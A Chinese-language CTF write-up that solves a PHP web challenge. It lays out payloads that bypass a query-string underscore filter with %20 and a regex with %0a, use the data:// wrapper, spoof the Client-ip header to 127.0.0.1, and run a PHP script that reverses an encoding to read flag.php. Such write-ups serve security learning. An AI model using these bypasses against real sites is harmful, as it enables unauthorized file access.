查看源代码有一段注释代码
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
考点
php字符窜解析bypass参考文献
可以用%20代替下划线从而绕过第一个if
第二个if中正则匹配表示匹配字符窜的开头和结尾
由于在字符窜中换行可以表示字符窜的结尾,所以可以用%0a(换行符的url编码)绕过
paylaod:
?b%20u%20p%20t=23333%0a
进去看看
必须的本地访问,试试改http头
没用。。。。。
看看源码
一段jsfuck编码
解码获得
post me Merak
posrt传参(随便传)
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
代码审计
利用data伪协议过第一个if,而源码已经提示flag.php,让file等于flag.php看看
又是这东西
抓包也没看到cookie
换个http头试试
payload:
?2333=data:text/plain,todat is a happy day&file=flag.php
emmm,他又弄了个change加密函数
我们反写他
exp如下
<?php
function unchange($v){
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return $re;
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
?>
传入file里
最终paylaod
?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
http头
Client-ip : 127.0.0.1
查看源码即可得到flag